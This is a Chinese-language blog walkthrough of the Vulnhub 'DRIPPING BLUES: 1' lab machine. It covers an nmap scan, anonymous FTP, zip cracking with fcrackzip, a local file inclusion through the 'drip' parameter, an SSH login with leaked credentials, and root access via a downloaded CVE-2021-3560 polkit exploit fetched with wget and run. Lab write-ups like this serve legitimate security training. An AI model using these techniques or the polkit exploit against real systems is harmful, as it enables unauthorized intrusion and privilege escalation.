Vulnhub 靶场 DRIPPING BLUES: 1,网络安全爱好者中心-神域博客网

前期准备：

靶机地址：https://www.vulnhub.com/entry/dripping-blues-1,744/

kali攻击机ip：192.168.60.128
靶机地址：192.168.660.138

注：这个靶机有坑，别钻死胡同。

一、信息收集

1.使用nmap对目标靶机进行扫描

发现开放了 21、22和80端口。

2. 21端口

匿名登录：

是个zip，下载下来看一下：

图片[3]-Vulnhub 靶场 DRIPPING BLUES: 1-安全小天地

发现有密码，那就爆破一下：

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u respectmydrip.zip

说注意 “dirp“ ，暂时没明白什么意思，secret.zip 压缩包也没爆破出来。

这个secret.zip压缩包就离谱，root权限都拿到了，还是没解出来

3. 80端口

说 drippingblues 又被黑了，现在是 drippingblues。并且有两个可疑用户名：travisscott & thugger。

nmap 的扫描中发现 80 端口下有 robots.txt 文件：

给了两个目录：

/dripisreal.txt

说是看看这个页面里的歌词，然后就得到了ssh密码，研究半天，放弃了，果然还是理科好，语言文字太难

https://www.azlyrics.com/lyrics/youngthug/constantlyhating.html
计算n个单词并将它们并排放置然后 md5sum
即，你好你好你好>> md5sum你好你好你好
这是ssh的密码

二、漏洞利用

另一个目录是 /etc/dripispowerful.html，在 /etc 下，应该有文件包含，扫一下目录：

猜测应该是提示文件包含漏洞，可以查看任意文件，我们用fuzz跑一下关键词，没跑出来，回想“just focus on \"drip\" ” 尝试一下，没想到真的是drip

http://192.168.60.138/index.php?drip=/etc/dripispowerful.html

成功获取一个密码，尝试ssh登录

查看源码发现密码，应该是用户 thugger 的， thugger:imdrippinbiatch。ssh 登录：

登陆成功。查看文件：

发现一个 flag： 5C50FC503A2ABE93B4C5EE3425496521

三、提权

卡了很长时间，没办法，查询了一下其他大哥的博客，有这样一个路子：

查看其他文件和权限都没有什么发现可利用的地方，查看下进程：

发现 polkitd，

polkit 是一个应用程序级别的工具集，通过定义和审核权限规则，实现不同优先级进程间的通讯：控制决策集中在统一的框架之中，决定低优先级进程是否有权访问高优先级进程。
Polkit 在系统层级进行权限控制，提供了一个低优先级进程和高优先级进程进行通讯的系统。和 sudo 等程序不同，Polkit 并没有赋予进程完全的 root 权限，而是通过一个集中的策略系统进行更精细的授权。
Polkit 定义出一系列操作，例如运行 GParted, 并将用户按照群组或用户名进行划分，例如 wheel 群组用户。然后定义每个操作是否可以由某些用户执行，执行操作前是否需要一些额外的确认，例如通过输入密码确认用户是不是属于某个群组。

在 github 上找到了它的提权漏洞

下载 CVE-2021-3560.py，赋权并运行：

wget https://github.com/Almorabea/Polkit-exploit/blob/main/CVE-2021-3560.py
chmod +x CVE-2021-3560.py
python3 CVE-2021-3560.py

得到 root 权限，查看 flag：78CE377EF7F10FF0EDCA63DD60EE63B8

到这里就已经获得了root权限了，但是回过头看，那首歌，还有那个secret.zip还没有破解，应该就是留下的坑吧，专门引导你迷路的，哎。
好鸡贼的作者！！！

------本文已结束，感谢您的阅读------

THE END

技术教程
# 渗透测试实战 # 渗透 # 靶机 # kali # vuln

Vulnhub 靶场 DRIPPING BLUES: 1